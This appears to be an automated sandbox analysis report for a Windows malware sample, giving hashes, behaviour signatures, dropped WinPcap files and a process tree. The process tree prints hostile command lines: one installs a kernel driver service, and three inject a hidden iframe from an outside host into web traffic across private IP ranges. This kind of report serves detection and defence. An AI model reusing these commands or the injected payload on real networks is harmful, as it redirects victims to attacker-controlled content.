Overview

overview

8

Static

static

3

a712dcf9f5...18.exe

windows7-x64

8

a712dcf9f5...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    134s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/08/2024, 14:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe

  • Size

    179KB

  • MD5

    a712dcf9f57862edd33c75e0491fc0c8

  • SHA1

    84f07f0923b7ed7f294548869ad8c5dd8fcdb32e

  • SHA256

    6c26c6482ea1e5de02bf9eef7faa4942c8dcada8ddbf8ad9c00e6e475e170d72

  • SHA512

    fa6988943199819e1091a266db224104de34d050d6079a84ca4aaf91d4e18a2c422ddb5799f96706130119f1f5531b9e1b01e957288312e1a9fa0a7bfc8d34bd

  • SSDEEP

    3072:HVSsGSTeAcU4V+YR2fwIEE8iRIte5x75rxo+d27B9tO96xz1nnHFaUYSJGOTPjFC:1SnSKAcURYAw23Rrl3d2/tOq1oSJ90+I

Score
8/10
discoveryexecutionpersistence

Malware Config

Signatures

  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 18 IoCs
  • Drops file in System32 directory 5 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\system32\sc.exe" create npf binpath= C:\Windows\system32\drivers\npf.sys type= kernel start= demand
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2956
    • C:\Windows\SysWOW64\svhstt.exe
      "C:\Windows\system32\svhstt.exe" -idx 0 -ip 192.168.0.1-192.168.200.254 -port 80 -insert "<iframe src='http://arp.baiduoo.com/arp.htm' width=0 height=0</iframe>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2408
    • C:\Windows\SysWOW64\svhstt.exe
      "C:\Windows\system32\svhstt.exe" -idx 0 -ip 10.0.1.1-10.0.200.254 -port 80 -insert "<iframe src='http://arp.baiduoo.com/arp.htm' width=0 height=0</iframe>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:3464
    • C:\Windows\SysWOW64\svhstt.exe
      "C:\Windows\system32\svhstt.exe" -idx 0 -ip 172.16.1.1-172.17.254.254 -port 80 -insert "<iframe src='http://arp.baiduoo.com/arp.htm' width=0 height=0</iframe>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1692

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\SysWOW64\Packet.dll
    Filesize

    86KB

    MD5

    9062aeea8cbfc4f0780bbbefad7cebcb

    SHA1

    c4ad39ec51ad0e84fe58f62931d13cddfde3189e

    SHA256

    b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

    SHA512

    60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

    Download Submit

  • C:\Windows\SysWOW64\WanPacket.dll
    Filesize

    66KB

    MD5

    fdd104a9fd3427a1df37041fa947a041

    SHA1

    cca1881a3c02033008f78cc39b712b637c7f3e13

    SHA256

    384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

    SHA512

    9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

    Download Submit

  • C:\Windows\SysWOW64\drivers\NPF.sys
    Filesize

    41KB

    MD5

    b15e0180c43d8b5219196d76878cc2dd

    SHA1

    33e676b37a3380de32c10ba5bc9170997445d314

    SHA256

    a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab

    SHA512

    47e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09

    Download Submit

  • C:\Windows\SysWOW64\npptools.dll
    Filesize

    48KB

    MD5

    38e7f4e56118d91df929dba40035c017

    SHA1

    a6fe6350e19622fd60561547a6a6882bdc52bfb7

    SHA256

    281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361

    SHA512

    c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4

    Download Submit

  • C:\Windows\SysWOW64\svhstt.exe
    Filesize

    13KB

    MD5

    ca42539e85a7f9bb372da8124f7a3254

    SHA1

    94ada2eaf210d3669b9d6873a5463eda6207a12a

    SHA256

    1a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f

    SHA512

    4e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017

    Download Submit

  • C:\Windows\SysWOW64\wpcap.dll
    Filesize

    234KB

    MD5

    ce842d25e5b7e6ff21a86cad9195fbe8

    SHA1

    d762270be089a89266b012351b52c595e260b59b

    SHA256

    7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

    SHA512

    84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

    Download Submit

  • memory/1488-0-0x0000000000400000-0x00000000004B5000-memory.dmp

    Filesize

    724KB

    Download

  • memory/1488-1-0x0000000000620000-0x0000000000621000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1488-8-0x0000000000400000-0x00000000004B5000-memory.dmp

    Filesize

    724KB

    Download

  • memory/1488-44-0x0000000000400000-0x00000000004B5000-memory.dmp

    Filesize

    724KB

    Download

  • memory/1692-54-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/1692-48-0x0000000000420000-0x0000000000435000-memory.dmp

    Filesize

    84KB

    Download

  • memory/1692-51-0x00000000004A0000-0x00000000004B0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1692-53-0x0000000000670000-0x0000000000671000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2408-26-0x00000000009C0000-0x00000000009D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2408-22-0x0000000000480000-0x0000000000495000-memory.dmp

    Filesize

    84KB

    Download

  • memory/2408-31-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/2408-30-0x0000000002290000-0x00000000022C2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/2408-15-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/3464-39-0x0000000000580000-0x0000000000590000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3464-41-0x0000000000A70000-0x0000000000A71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3464-42-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/3464-36-0x0000000000540000-0x0000000000555000-memory.dmp

    Filesize

    84KB

    Download